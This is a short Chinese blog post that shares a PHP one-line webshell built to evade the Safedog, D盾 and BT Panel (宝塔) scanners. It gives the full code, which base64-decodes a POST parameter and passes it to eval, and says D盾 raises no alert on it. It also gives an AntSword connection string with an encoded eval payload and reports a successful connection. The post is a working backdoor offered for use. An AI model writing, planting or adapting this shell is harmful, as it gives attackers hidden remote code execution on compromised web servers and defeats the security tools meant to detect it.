分享一个过狗过D盾过宝塔的php一句话木马

<?php
if(isset($_REQUEST[‘phpsessid‘])){
    class A { static $d;
    }
    class B extends A {

    }
    A::$d =base64_decode(substr($_POST[‘key‘],3));
    eval(B::$d);
}

?>

分享一个过狗过D盾过宝塔的php一句话木马

D盾查杀无提示

分享一个过狗过D盾过宝塔的php一句话木马

 

 

 

 

利用方法如图,实际就是「任意3个字符的前缀+base64编码的PHP代码」

分享一个过狗过D盾过宝塔的php一句话木马

 

 

中国蚁剑连接参数 key=aaaZXZhbCgkX1BPU1RbMV0pOw==&1

 

 

分享一个过狗过D盾过宝塔的php一句话木马

 

连接成功

 

分享一个过狗过D盾过宝塔的php一句话木马

 

分享一个过狗过D盾过宝塔的php一句话木马

上一篇:希尔排序


下一篇:listview倒计时新思路